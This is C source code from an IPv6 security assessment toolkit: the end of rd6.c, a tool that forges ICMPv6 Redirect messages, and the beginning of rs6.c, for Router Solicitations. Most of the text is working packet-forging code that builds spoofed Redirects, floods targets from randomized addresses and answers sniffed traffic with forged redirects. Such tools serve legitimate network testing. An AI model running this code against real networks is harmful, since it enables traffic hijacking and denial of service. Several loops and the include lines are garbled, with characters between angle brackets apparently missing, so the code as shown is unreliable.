if(!tcpwin_f) tcpwin= ((u_int16_t) random() + 1500) & (u_int16_t)0x7f00; if(!peerport_f) peerport= random(); if(!redirport_f) redirport= random(); if(!tcpurg_f) tcpurg= 0; } if(rhudp_f){ if(!peerport_f) peerport= random(); if(!redirport_f) redirport= random(); } if(rhicmp6_f){ if(!icmp6id_f) icmp6id= random(); if(!icmp6seq_f) icmp6seq= random(); } if(idata.verbose_f){ print_attack_info(&idata); } /* Set filter for IPv6 packets (find_ipv6_router() set its own filter fore receiving RAs) */ if(pcap_compile(idata.pfd, &pcap_filter, PCAP_IPV6_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); /* Set initial contents of the attack packet */ init_packet_data(&idata); /* Fire an ICMPv6 Redirect if an IPv6 Destination Address was specified */ if((idata.dstaddr_f) && (targetaddr_f || floodt_f) && (rediraddr_f || floodr_f)){ send_packet(&idata, NULL, NULL); if(idata.verbose_f) puts("Initial attack packet(s) sent successfully."); if(loop_f){ if(idata.verbose_f) printf("Now sending Redirect Messages every %u second%s...\n", nsleep, \ ((nsleep>1)?"s":"")); while(loop_f){ sleep(nsleep); send_packet(&idata, NULL, NULL); } } exit(EXIT_SUCCESS); } if(idata.listen_f){ if(idata.verbose_f){ print_filters(&idata, &filters); puts("Listening to incoming IPv6 messages..."); } if( (idata.fd= pcap_fileno(idata.pfd)) == -1){ puts("Error obtaining descriptor number for pcap_t"); exit(EXIT_FAILURE); } FD_ZERO(&sset); FD_SET(idata.fd, &sset); while(idata.listen_f){ rset= sset; if((sel=select(idata.fd+1, &rset, NULL, NULL, NULL)) == -1){ if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } /* Read an IPv6 packet */ if((r=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } else if(r == 0){ continue; /* Should never happen */ } pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + ETHER_HDR_LEN); accepted_f=0; if(idata.type == DLT_EN10MB && idata.flags != IFACE_LOOPBACK){ if(filters.nblocklinksrc){ if(match_ether(filters.blocklinksrc, filters.nblocklinksrc, &(pkt_ether->src))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nblocklinkdst){ if(match_ether(filters.blocklinkdst, filters.nblocklinkdst, &(pkt_ether->dst))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } } if(filters.nblocksrc){ if(match_ipv6(filters.blocksrc, filters.blocksrclen, filters.nblocksrc, &(pkt_ipv6->ip6_src))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nblockdst){ if(match_ipv6(filters.blockdst, filters.blockdstlen, filters.nblockdst, &(pkt_ipv6->ip6_dst))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(idata.type == DLT_EN10MB && idata.flags != IFACE_LOOPBACK){ if(filters.nacceptlinksrc){ if(match_ether(filters.acceptlinksrc, filters.nacceptlinksrc, &(pkt_ether->src))) accepted_f=1; } if(filters.nacceptlinkdst && !accepted_f){ if(match_ether(filters.acceptlinkdst, filters.nacceptlinkdst, &(pkt_ether->dst))) accepted_f= 1; } } if(filters.nacceptsrc && !accepted_f){ if(match_ipv6(filters.acceptsrc, filters.acceptsrclen, filters.nacceptsrc, &(pkt_ipv6->ip6_src))) accepted_f= 1; } if(filters.nacceptdst && !accepted_f){ if(match_ipv6(filters.acceptdst, filters.acceptdstlen, filters.nacceptdst, &(pkt_ipv6->ip6_dst))) accepted_f=1; } if(filters.acceptfilters_f && !accepted_f){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } if(idata.verbose_f>1) print_filter_result(&idata, pktdata, ACCEPTED); /* Send a Redirect message */ send_packet(&idata, pktdata, pkthdr); } exit(EXIT_SUCCESS); } if(!(idata.dstaddr_f && (targetaddr_f || floodt_f) && (rediraddr_f || floodr_f)) && !idata.listen_f){ puts("Error: Nothing to send! (key parameters left unspecified, and not using listening mode)"); exit(EXIT_FAILURE); } exit(EXIT_SUCCESS); } /* * Function: init_packet_data() * * Initialize the contents of the attack packet (Ethernet header, IPv6 Header, and ICMPv6 header) * that are expected to remain constant for the specified attack. */ void init_packet_data(struct iface_data *idata){ ethernet= (struct ether_header *) buffer; v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; if(idata->flags != IFACE_TUNNEL && idata->flags != IFACE_LOOPBACK){ ethernet->src = idata->hsrcaddr; ethernet->dst = idata->hdstaddr; ethernet->ether_type = htons(ETHERTYPE_IPV6); } ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= hoplimit; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= idata->dstaddr; prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if(hbhopthdr_f){ hbhopthdrs=0; while(hbhopthdrs < nhbhopthdr){ if((ptr+ hbhopthdrlen[hbhopthdrs]) > (v6buffer+ ETH_DATA_LEN)){ puts("Packet too large while processing HBH Opt. Header"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_HOPOPTS; prev_nh = ptr; memcpy(ptr, hbhopthdr[hbhopthdrs], hbhopthdrlen[hbhopthdrs]); ptr = ptr + hbhopthdrlen[hbhopthdrs]; hbhopthdrs++; } } if(dstoptuhdr_f){ dstoptuhdrs=0; while(dstoptuhdrs < ndstoptuhdr){ if((ptr+ dstoptuhdrlen[dstoptuhdrs]) > (v6buffer+ ETH_DATA_LEN)){ puts("Packet too large while processing Dest. Opt. Header (Unfrag. Part)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstoptuhdr[dstoptuhdrs], dstoptuhdrlen[dstoptuhdrs]); ptr = ptr + dstoptuhdrlen[dstoptuhdrs]; dstoptuhdrs++; } } /* Everything that follows is the Fragmentable Part of the packet */ fragpart = ptr; if(fragh_f){ /* Check that we are able to send the Unfragmentable Part, together with a Fragment Header and a chunk data over our link layer */ if( (fragpart+sizeof(fraghdr)+nfrags) > (v6buffer+ETH_DATA_LEN)){ puts("Unfragmentable part too large for current MTU (1500 bytes)"); exit(EXIT_FAILURE); } /* We prepare a separete Fragment Header, but we do not include it in the packet to be sent. This Fragment Header will be used (an assembled with the rest of the packet by the send_packet() function. */ bzero(&fraghdr, FRAG_HDR_SIZE); *prev_nh = IPPROTO_FRAGMENT; prev_nh = (unsigned char *) &fraghdr; } if(dstopthdr_f){ dstopthdrs=0; while(dstopthdrs < ndstopthdr){ if((ptr+ dstopthdrlen[dstopthdrs]) > (v6buffer + idata->max_packet_size)){ puts("Packet too large while processing Dest. Opt. Header (should be using the Frag. option?)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstopthdr[dstopthdrs], dstopthdrlen[dstopthdrs]); ptr = ptr + dstopthdrlen[dstopthdrs]; dstopthdrs++; } } *prev_nh = IPPROTO_ICMPV6; if( (ptr+sizeof(struct nd_redirect)) > (v6buffer + idata->max_packet_size)){ puts("Packet too large while inserting ICMPv6 Redirect header (should be using Frag. option?)"); exit(EXIT_FAILURE); } rd= (struct nd_redirect *) ptr; rd->nd_rd_type = ND_REDIRECT; rd->nd_rd_code = 0; rd->nd_rd_reserved = 0; rd->nd_rd_target = targetaddr; rd->nd_rd_dst = rediraddr; ptr += sizeof(struct nd_redirect); if(tllaopt_f && nlinkaddr==1){ if( (ptr+sizeof(struct nd_opt_tlla)) <= (v6buffer + idata->max_packet_size) ){ tllaopt = (struct nd_opt_tlla *) ptr; tllaopt->type= ND_OPT_TARGET_LINKADDR; tllaopt->length= TLLA_OPT_LEN; bcopy(linkaddr[0].a, tllaopt->address, ETH_ALEN); ptr += sizeof(struct nd_opt_tlla); } else{ puts("Packet Too Large while processing target link-layer address option"); exit(EXIT_FAILURE); } } startofprefixes=ptr; } /* * Function: send_packet() * * Initialize the remaining fields of the Neighbor Advertisement Message, and * send the attack packet(s). */ void send_packet(struct iface_data *idata, const u_char *pktdata, struct pcap_pkthdr *pkthdr){ if(pktdata != NULL){ /* Sending a Redirect in response to a received packet */ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata->linkhsize); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_ipv6 + sizeof(struct ip6_hdr) + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_ipv6 + sizeof(struct ip6_hdr) + pkt_ipv6->ip6_plen; pkt_ipv6addr = &(pkt_ipv6->ip6_src); /* We don't send any packets if the Source Address of the captured packet is the unspecified address. */ if(IN6_IS_ADDR_UNSPECIFIED(pkt_ipv6addr)){ return; } else{ ipv6->ip6_dst = pkt_ipv6->ip6_src; ethernet->dst = pkt_ether->src; } pkt_ipv6addr = &(pkt_ipv6->ip6_dst); /* We respond to packets sent to a multicast address only if the tool has been explicitly instructed to do so. */ if(IN6_IS_ADDR_MULTICAST(pkt_ipv6addr) && !respmcast_f) return; rd->nd_rd_dst = pkt_ipv6->ip6_dst; } sources=0; do{ if(floods_f){ /* Randomizing the IPv6 Source address based on the prefix specified by "srcaddr" and srcpreflen. */ startrand= idata->srcpreflen/16; for(i=0; iip6_src.s6_addr16[i]= 0; for(i=startrand; i<8; i++) ipv6->ip6_src.s6_addr16[i]=random(); if(idata->srcpreflen%16){ mask=0xffff; for(i=0; i<(idata->srcpreflen%16); i++) mask= mask>>1; ipv6->ip6_src.s6_addr16[startrand]= ipv6->ip6_src.s6_addr16[startrand] \ & htons(mask); } for(i=0; i<=(idata->srcpreflen/16); i++) ipv6->ip6_src.s6_addr16[i]= ipv6->ip6_src.s6_addr16[i] | idata->srcaddr.s6_addr16[i]; if(!idata->hsrcaddr_f){ for(i=0; i<6; i++) ethernet->src.a[i]= random(); } if(tllaopt_f && !tllaopta_f){ bcopy(ethernet->src.a, tllaopt->address, ETH_ALEN); } } redirs=0; do{ if(floodr_f){ /* Randomizing the Redirected Address based on the prefix specified by rediraddr and redirpreflen. */ startrand= redirpreflen/16; for(i=0; ind_rd_dst.s6_addr16[i]= 0; for(i=startrand; i<8; i++) rd->nd_rd_dst.s6_addr16[i]=random(); if(redirpreflen%16){ mask=0xffff; for(i=0; i<(redirpreflen%16); i++) mask= mask>>1; rd->nd_rd_dst.s6_addr16[startrand]= rd->nd_rd_dst.s6_addr16[startrand] \ & htons(mask); } for(i=0; i<=(redirpreflen/16); i++) rd->nd_rd_dst.s6_addr16[i]= rd->nd_rd_dst.s6_addr16[i] | \ rediraddr.s6_addr16[i]; } targets=0; do{ if(floodt_f){ /* Randomizing the Redirect Target Address based on the prefix specified by targetaddr and targetpreflen. */ startrand= targetpreflen/16; for(i=0; ind_rd_target.s6_addr16[i]= 0; for(i=startrand; i<8; i++) rd->nd_rd_target.s6_addr16[i]=random(); if(targetpreflen%16){ mask=0xffff; for(i=0; i<(targetpreflen%16); i++) mask= mask>>1; rd->nd_rd_target.s6_addr16[startrand]= rd->nd_rd_target.s6_addr16[startrand] \ & htons(mask); } for(i=0; i<=(targetpreflen/16); i++) rd->nd_rd_target.s6_addr16[i]= rd->nd_rd_target.s6_addr16[i] | \ targetaddr.s6_addr16[i]; } else if(makeonlink_f && floodr_f){ /* The target field contains the address specified by the "-t" option. Otherwise (if we must make the address "on-link", the ND target field is set to the same value as the RD Destination Address */ rd->nd_rd_target= rd->nd_rd_dst; } /* * If a single target link-layer address option is to be included, it is included * by init_packet_data() */ if(nlinkaddr==1) linkaddrs=1; else linkaddrs=0; ptr=startofprefixes; while(linkaddrsmax_packet_size){ tllaopt = (struct nd_opt_tlla *) ptr; tllaopt->type= ND_OPT_TARGET_LINKADDR; tllaopt->length= TLLA_OPT_LEN; bcopy(linkaddr[linkaddrs].a, tllaopt->address, ETH_ALEN); ptr += sizeof(struct nd_opt_tlla); linkaddrs++; newdata_f=1; } if(linkaddrs 1280) rhbytes=48; else rhbytes= 1280- currentsize - sizeof(struct nd_opt_rd_hdr); } pktbytes= pkt_end - (unsigned char*) pkt_ipv6; if( rhbytes > pktbytes) rhbytes= pktbytes; rhbytes= (rhbytes>>3) << 3; if( (ptr+sizeof(struct nd_opt_rd_hdr)+rhbytes) > (v6buffer + idata->max_packet_size)){ puts("Packet Too Large while inserting Redirected Header Option"); exit(EXIT_FAILURE); } rh = (struct nd_opt_rd_hdr *) ptr; rh->nd_opt_rh_type = ND_OPT_REDIRECTED_HEADER; rh->nd_opt_rh_len = rhbytes/8 + 1; rh->nd_opt_rh_reserved1= 0; rh->nd_opt_rh_reserved2= 0; ptr+= sizeof(struct nd_opt_rd_hdr); bcopy(pkt_ipv6, ptr, rhbytes); ptr+= rhbytes; } else{ /* The Redirect is *not* being sent in response to a received packet */ if(rhlength_f){ rhbytes= rhlength; } else{ currentsize= ptr - (unsigned char *)ipv6; if( (currentsize+sizeof(struct nd_opt_rd_hdr)) > 1280) rhbytes=48; else rhbytes= 1280- currentsize - sizeof(struct nd_opt_rd_hdr); } rhbytes= (rhbytes>>3) << 3; if( (ptr+sizeof(struct nd_opt_rd_hdr)+rhbytes) > (v6buffer + idata->max_packet_size)){ puts("Packet Too Large while inserting Redirected Header Option"); exit(EXIT_FAILURE); } rh = (struct nd_opt_rd_hdr *) ptr; rh->nd_opt_rh_type = ND_OPT_REDIRECTED_HEADER; rh->nd_opt_rh_len = rhbytes/8 + 1; rh->nd_opt_rh_reserved1= 0; rh->nd_opt_rh_reserved2= 0; ptr+= sizeof(struct nd_opt_rd_hdr); rhipv6 = (struct ip6_hdr *) rhbuff; rhipv6->ip6_flow= 0; rhipv6->ip6_vfc= 0x60; rhipv6->ip6_plen= htons(ip6length); rhipv6->ip6_hlim= ip6hoplimit; rhipv6->ip6_src= peeraddr; rhipv6->ip6_dst= rd->nd_rd_dst; if(rhtcp_f || rhdefault_f){ rhipv6->ip6_nxt= IPPROTO_TCP; rhtcp= (struct tcp_hdr *) (rhbuff + sizeof(struct ip6_hdr)); bzero(rhtcp, sizeof(struct tcp_hdr)); rhtcp->th_sport= htons(peerport); rhtcp->th_dport= htons(redirport); rhtcp->th_seq = htonl(tcpseq); rhtcp->th_ack= htonl(tcpack); rhtcp->th_flags= tcpflags; rhtcp->th_urp= htons(tcpurg); rhtcp->th_win= htons(tcpwin); rhtcp->th_off= MIN_TCP_HLEN >> 2; rhtcp->th_sum = random(); if(rhbytes <= (MIN_IPV6_HLEN + MIN_TCP_HLEN)){ bcopy(rhbuff, ptr, rhbytes); ptr+= rhbytes; } else{ bcopy(rhbuff, ptr, MIN_IPV6_HLEN+MIN_TCP_HLEN); ptr += MIN_IPV6_HLEN+MIN_TCP_HLEN; rhbytes -= MIN_IPV6_HLEN+MIN_TCP_HLEN; while(rhbytes>=4){ *(u_int32_t *)ptr = random(); ptr += sizeof(u_int32_t); rhbytes -= sizeof(u_int32_t); } } } else if(rhudp_f){ rhipv6->ip6_nxt= IPPROTO_UDP; rhudp = (struct udp_hdr *) (rhbuff + sizeof(struct ip6_hdr)); rhudp->uh_sport= htons(peerport); rhudp->uh_dport= htons(redirport); rhudp->uh_ulen= rhipv6->ip6_plen; rhudp->uh_sum= random(); if(rhbytes <= (MIN_IPV6_HLEN + MIN_UDP_HLEN)){ bcopy(rhbuff, ptr, rhbytes); ptr+= rhbytes; } else{ bcopy(rhbuff, ptr, MIN_IPV6_HLEN+MIN_UDP_HLEN); ptr += MIN_IPV6_HLEN+MIN_UDP_HLEN; rhbytes -= MIN_IPV6_HLEN+MIN_UDP_HLEN; while(rhbytes>=4){ *(u_int32_t *)ptr = random(); ptr += sizeof(u_int32_t); rhbytes -= sizeof(u_int32_t); } } } else if(rhicmp6_f){ rhipv6->ip6_nxt= IPPROTO_ICMPV6; rhicmp6 = (struct icmp6_hdr *) (rhbuff + sizeof(struct ip6_hdr)); rhicmp6->icmp6_type = ICMP6_ECHO_REQUEST; rhicmp6->icmp6_code = 0; rhicmp6->icmp6_cksum = random(); rhicmp6->icmp6_data16[0]= random(); /* Identifier */ rhicmp6->icmp6_data16[1]= random(); /* Sequence Number */ if(rhbytes <= (MIN_IPV6_HLEN + MIN_ICMP6_HLEN)){ bcopy(rhbuff, ptr, rhbytes); ptr+= rhbytes; } else{ bcopy(rhbuff, ptr, MIN_IPV6_HLEN+MIN_ICMP6_HLEN); ptr += MIN_IPV6_HLEN+MIN_ICMP6_HLEN; rhbytes -= MIN_IPV6_HLEN+MIN_ICMP6_HLEN; while(rhbytes>=4){ *(u_int32_t *)ptr = random(); ptr += sizeof(u_int32_t); rhbytes -= sizeof(u_int32_t); } } } } } rd->nd_rd_cksum = 0; rd->nd_rd_cksum = in_chksum(v6buffer, rd, ptr-((unsigned char *)rd), IPPROTO_ICMPV6); if(!fragh_f){ ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); if((nw=pcap_inject(idata->pfd, buffer, ptr - buffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (ptr-buffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, \ (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } else{ ptrend= ptr; ptr= fragpart; fptr = fragbuffer; fipv6 = (struct ip6_hdr *) (fragbuffer + ETHER_HDR_LEN); fptrend = fptr + ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD; memcpy(fptr, buffer, fragpart-buffer); fptr = fptr + (fragpart-buffer); if( (fptr+FRAG_HDR_SIZE)> fptrend){ puts("Unfragmentable Part is Too Large"); exit(EXIT_FAILURE); } memcpy(fptr, (char *) &fraghdr, FRAG_HDR_SIZE); fh= (struct ip6_frag *) fptr; fh->ip6f_ident=random(); startoffragment = fptr + FRAG_HDR_SIZE; /* * Check that the selected fragment size is not larger than the largest * fragment size that can be sent */ if(nfrags <= (fptrend - fptr)) fragsize=nfrags; else fragsize= (fptrend-fptr) & IP6F_OFF_MASK; m=IP6F_MORE_FRAG; while((ptr< ptrend) && m==IP6F_MORE_FRAG){ fptr= startoffragment; if( (ptrend-ptr) <= fragsize){ fragsize= ptrend-ptr; m=0; } memcpy(fptr, ptr, fragsize); fh->ip6f_offlg = (htons(ptr-fragpart) & IP6F_OFF_MASK) | m; ptr+=fragsize; fptr+=fragsize; fipv6->ip6_plen = htons((fptr - fragbuffer) - MIN_IPV6_HLEN - ETHER_HDR_LEN); if((nw=pcap_inject(idata->pfd, fragbuffer, fptr - fragbuffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (fptr- fragbuffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", \ (LUI) nw, (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } /* Sending fragments */ } /* Sending fragmented datagram */ targets++; }while(targets\n" "Please send any bug reports to " ); } /* * Function: print_attack_info() * * Prints attack details (when the verbose ("-v") option is specified). */ void print_attack_info(struct iface_data *idata){ puts( "rd6 version 1.1\nAssessment tool for attack vectors based on Redirect messages\n\n"); if(makeonlink_f) puts("Making nodes on-link (setting the RD Target Address to the RD Destination Address)"); if(floods_f) printf("Flooding the target from %u different IPv6 Source Addresses\n", nsources); if(floodr_f) printf("Flooding the target with %u Redirected Addresses\n", nredirs); if(floodt_f) printf("Flooding the target with %u Target Addresses\n", ntargets); if(!floods_f){ if(ether_ntop(&idata->hsrcaddr, plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s%s\n", plinkaddr, ((!idata->hsrcaddr_f)?" (randomized)":"")); } else{ if(idata->hsrcaddr_f){ if(ether_ntop(&idata->hsrcaddr, plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s\n", plinkaddr); } else puts("Ethernet Source Address: randomized for each packet"); } /* Ethernet Destination Address only used if a IPv6 Destination Address or an Ethernet Destination Address were specified. */ if(idata->dstaddr_f){ if(ether_ntop(&idata->hdstaddr, plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Destination Address: %s%s\n", plinkaddr, \ ((!idata->hdstaddr_f)?" (all-nodes multicast)":"")); } if(inet_ntop(AF_INET6, &idata->srcaddr, psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } if(!floods_f){ printf("IPv6 Source Address: %s%s\n", psrcaddr, ((!idata->srcaddr_f)?" (randomized)":"")); } else{ printf("IPv6 Source Address: randomized, from the %s/%u prefix%s\n", psrcaddr, idata->srcpreflen, \ (!idata->srcprefix_f)?" (default)":""); } if(idata->dstaddr_f){ if(inet_ntop(AF_INET6, &(idata->dstaddr), pdstaddr, sizeof(pdstaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Destination Address to presentation format"); exit(EXIT_FAILURE); } printf("IPv6 Destination Address: %s%s\n", pdstaddr, ((!idata->dstaddr_f)?" (all-nodes link-local multicast)":"")); } printf("IPv6 Hop Limit: %u%s\n", hoplimit, (hoplimit_f)?"":" (default)"); for(i=0; idstaddr_f){ if(!floodr_f){ printf("Redirect Destination Address: %s%s\n", pv6addr, ((!rediraddr_f)?" (randomized)":"")); } else{ printf("Redirect Destination Address: randomized, from the %s/%u prefix%s\n", pv6addr, redirpreflen, \ (!redirprefix_f)?" (default)":""); } } if(inet_ntop(AF_INET6, &targetaddr, pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting Redirect Target Address to presentation format"); exit(EXIT_FAILURE); } if(idata->dstaddr_f && targetaddr_f){ if(!floodt_f){ printf("Redirect Target Address: %s%s\n", pv6addr, ((!targetaddr_f)?" (randomized)":"")); } else{ printf("Redirect Target Address: randomized, from the %s/%u prefix%s\n", pv6addr, targetpreflen, \ (!targetprefix_f)?" (default)":""); } } for(i=0;i Address: %s\n", \ ((floods_f && !tllaopta_f)?"(randomized for each packet)":plinkaddr)); } if((rhtcp_f || rhdefault_f) && idata->dstaddr_f){ printf("Payload Type: IPv6/TCP%s\n", (rhdefault_f?" (default)":"")); printf("Source Port: %u%s\tDestination Port: %u%s\n", peerport, (peerport_f?"":" (randomized)"),\ redirport, (redirport_f?"":" (randomized)")); printf("SEQ Number: %u%s\tACK Number: %u%s\n", tcpseq, (tcpseq_f?"":" (randomized)"), \ tcpack, (tcpack_f?"":" (randomized)")); printf("Flags: %s%s%s%s%s%s%s%s\t", ((tcpflags & TH_FIN)?"F":""), ((tcpflags & TH_SYN)?"S":""), \ ((tcpflags & TH_RST)?"R":""), ((tcpflags & TH_PUSH)?"P":""),\ ((tcpflags & TH_ACK)?"A":""), ((tcpflags & TH_URG)?"U":""),\ ((!tcpflags)?"none":""), ((!tcpflags_f)?" (default)":"")); printf("Window: %u%s\tURG Pointer: %u%s\n", tcpwin, (tcpwin_f?"":" (randomized)"), \ tcpurg, (tcpurg_f?"":" (default)")); } if(rhudp_f && idata->dstaddr_f){ puts("Payload Type: IPv6/UDP"); printf("Source Port: %u%s\tDestination Port: %u%s\n", peerport, (peerport_f?"":" (randomized)"),\ redirport, (redirport_f?"":" (randomized)")); } if(rhicmp6_f && idata->dstaddr_f){ puts("Payload Type: IPv6/ICMPv6 Echo Request"); printf("Identifier: %u%s\tSequence Number: %u%s", icmp6id, (icmp6id_f?"":" (randomized)"), \ icmp6seq, (icmp6seq_f?"":" (randomized)")); } } ipv6toolkit-1.5.1/tools/rd6.h000066400000000000000000000000541223702747200160210ustar00rootroot00000000000000/* * Header file for the rd6 tool * */ ipv6toolkit-1.5.1/tools/rs6.c000066400000000000000000000654761223702747200160560ustar00rootroot00000000000000/* * rs6: A security assessment tool for attack vectors based on * ICMPv6 Router Solicitation messages * * Copyright (C) 2009-2013 Fernando Gont * * Programmed by Fernando Gont for SI6 Networks * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * * Build with: make rs6 * * The libpcap library must be previously installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "rs6.h" #include "libipv6.h" #include "ipv6toolkit.h" void init_packet_data(struct iface_data *); void send_packet(struct iface_data *); void print_attack_info(struct iface_data *); void usage(void); void print_help(void); pcap_t *pfd; struct pcap_pkthdr *pkthdr; const u_char *pktdata; struct in6_addr *pkt_ipv6addr; bpf_u_int32 my_netmask; bpf_u_int32 my_ip; struct bpf_program pcap_filter; char dev[64], errbuf[PCAP_ERRBUF_SIZE]; char all_nodes_addr[]= ALL_NODES_MULTICAST_ADDR; unsigned char buffer[65556]; unsigned char *v6buffer, *ptr, *startofprefixes; struct ip6_hdr *ipv6, *pkt_ipv6; struct nd_router_solicit *rs; struct ether_header *ethernet, *pkt_ether; struct nd_opt_slla *sllaopt; char *lasts, *endptr; size_t nw; unsigned long ul_res, ul_val; unsigned int i, j, sources, nsources, startrand; u_int16_t mask; u_int8_t hoplimit; struct ether_addr linkaddr[MAX_SLLA_OPTION]; unsigned int nlinkaddr=0, linkaddrs; unsigned int nsleep; char *charptr; char plinkaddr[ETHER_ADDR_PLEN], phsrcaddr[ETHER_ADDR_PLEN], phdstaddr[ETHER_ADDR_PLEN]; char psrcaddr[INET6_ADDRSTRLEN], pdstaddr[INET6_ADDRSTRLEN], pprefix[INET6_ADDRSTRLEN]; unsigned char sllopt_f=0, sllopta_f=0, loop_f = 0, sleep_f=0, floods_f=0, hoplimit_f=0; unsigned char newdata_f=0; /* Support for IPv6 extension headers */ unsigned int dstopthdrs, dstoptuhdrs, hbhopthdrs; unsigned char hbhopthdr_f=0, dstoptuhdr_f=0, dstopthdr_f=0; unsigned char *dstopthdr[MAX_DST_OPT_HDR], *dstoptuhdr[MAX_DST_OPT_U_HDR]; unsigned char *hbhopthdr[MAX_HBH_OPT_HDR]; unsigned int dstopthdrlen[MAX_DST_OPT_HDR], dstoptuhdrlen[MAX_DST_OPT_U_HDR]; unsigned int hbhopthdrlen[MAX_HBH_OPT_HDR], m, pad; struct ip6_frag fraghdr, *fh; struct ip6_hdr *fipv6; unsigned char fragh_f=0; unsigned char fragbuffer[ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD]; unsigned char *fragpart, *fptr, *fptrend, *ptrend, *ptrhdr, *ptrhdrend; unsigned int hdrlen, ndstopthdr=0, nhbhopthdr=0, ndstoptuhdr=0; unsigned int nfrags, fragsize; unsigned char *prev_nh, *startoffragment; struct iface_data idata; int main(int argc, char **argv){ extern char *optarg; int r; static struct option longopts[] = { {"interface", required_argument, 0, 'i'}, {"src-address", required_argument, 0, 's'}, {"dst-address", required_argument, 0, 'd'}, {"hop-limit", required_argument, 0, 'A'}, {"dst-opt-hdr", required_argument, 0, 'u'}, {"dst-opt-u-hdr", required_argument, 0, 'U'}, {"hbh-opt-hdr", required_argument, 0, 'H'}, {"frag-hdr", required_argument, 0, 'y'}, {"link-src-address", required_argument, 0, 'S'}, {"link-dst-address", required_argument, 0, 'D'}, {"add-slla-opt", no_argument, 0, 'e'}, {"src-link-opt", required_argument, 0, 'E'}, {"flood-sources", required_argument, 0, 'F'}, {"loop", no_argument, 0, 'l'}, {"sleep", no_argument, 0, 'z'}, {"verbose", no_argument, 0, 'v'}, {"help", no_argument, 0, 'h'} }; char shortopts[]= "i:s:d:A:u:U:H:y:S:D:eE:F:lz:vh"; char option; if(argc<=1){ usage(); exit(EXIT_FAILURE); } hoplimit=255; if(init_iface_data(&idata) == FAILURE){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } while((r=getopt_long(argc, argv, shortopts, longopts, NULL)) != -1) { option= r; switch(option) { case 'i': /* Interface */ strncpy(idata.iface, optarg, IFACE_LENGTH-1); idata.iface[IFACE_LENGTH-1]=0; idata.iface_f=TRUE; break; case 's': /* IPv6 Source Address */ if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in IPv6 Source Address ('-s' option)"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &(idata.srcaddr)) <= 0){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } idata.srcaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ idata.srcpreflen = atoi(charptr); if(idata.srcpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&(idata.srcaddr), idata.srcpreflen); idata.srcprefix_f=1; } break; case 'd': /* IPv6 Destination Address */ if( inet_pton(AF_INET6, optarg, &(idata.dstaddr)) <= 0){ 